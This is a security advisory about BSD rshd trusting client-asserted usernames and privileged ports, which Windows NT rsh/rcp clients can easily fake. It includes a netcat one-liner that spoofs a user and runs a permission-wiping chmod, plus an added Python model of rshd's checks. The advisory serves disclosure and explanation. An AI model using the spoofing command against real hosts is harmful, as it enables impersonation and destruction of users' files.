COMMAND

    rsh/rcp

SYSTEMS AFFECTED

    Win NT and unices

PROBLEM

    Eric Gisin found the following.  This is really a UNIX rshd bug,
    but it affects users of the NT clients.  It's old news that the
    BSD rsh/rcp services are not secure; however, rshd is still
    enabled on many UNIX systems.  There are rsh/rcp clients in
    Windows NT, and people are not aware of the ease of defeating
    security in this environment.  The security of this service is
    based on privileged ports, which are not widely implemented.  The
    NT versions of rcp/rsh have no special privileges, unlike the
    UNIX versions.  Anyone can modify the source or use netcat to
    fake the client username.  For example,

        D:> nc -v unixhost 514 -p 666
        ^@newbie^@newbie^@chmod a= .^@

    This will execute the chmod command under newbie's account, if he
    permits access from that client machine in .rhosts.  Basically,
    the problem is that since Windows NT includes rsh/rcp, people
    assume it is as secure as the UNIX counterpart, which is not the
    case.
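
    The server-side view of the request above, as an added example
    that is not part of the original advisory or of rshd itself: a
    simplified Python model of the two checks rshd applies (source
    port in 512-1023, then a .rhosts match), run on the request bytes
    shown above.  The client host name "ntclient" and the .rhosts
    contents are constructed; hosts.equiv, netgroups and negative
    entries are left out.

```python
# Added example: simplified model of rshd's checks, not rshd source code.
RESERVED_LOW, RESERVED_HIGH = 512, 1023  # source ports rshd accepts

# Request bytes from the advisory (^@ is NUL); host and .rhosts are constructed.
REQUEST = b"\x00newbie\x00newbie\x00chmod a= .\x00"
CLIENT_HOST = "ntclient"
RHOSTS = "ntclient\n"


def parse_rsh_request(data):
    """Split the four NUL-terminated fields sent on TCP port 514."""
    fields = data.split(b"\x00")
    if len(fields) != 5 or fields[4] != b"":
        raise ValueError("expected four NUL-terminated fields")
    port, cuser, suser, cmd = (f.decode("ascii") for f in fields[:4])
    return {
        "stderr_port": int(port or "0"),  # empty or 0: no stderr channel
        "client_user": cuser,  # asserted by the client, not verified
        "server_user": suser,  # account the command runs under
        "command": cmd,
    }


def rhosts_allows(rhosts_text, client_host, client_user, server_user):
    """Match 'host [user]' lines; no user means same name as the account."""
    for line in rhosts_text.splitlines():
        parts = line.split()
        if not parts:
            continue
        user = parts[1] if len(parts) > 1 else server_user
        if parts[0] in ("+", client_host) and user in ("+", client_user):
            return True
    return False


def rshd_decision(src_port, client_host, data, rhosts_text):
    """Return the outcome and the reason, in the order rshd checks."""
    if not RESERVED_LOW <= src_port <= RESERVED_HIGH:
        return "rejected: source port outside 512-1023"
    req = parse_rsh_request(data)
    if not rhosts_allows(rhosts_text, client_host,
                         req["client_user"], req["server_user"]):
        return "rejected: no matching .rhosts entry"
    return "accepted: %r runs as %s" % (req["command"], req["server_user"])


if __name__ == "__main__":
    for port in (666, 40000):  # 666 is the -p value used in the advisory
        print(port, rshd_decision(port, CLIENT_HOST, REQUEST, RHOSTS))
```

    Every input to the decision except the source address is supplied
    by the client, so the port check means something only when the
    client OS reserves ports below 1024 for privileged processes.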

SOLUTION

    Nothing yet.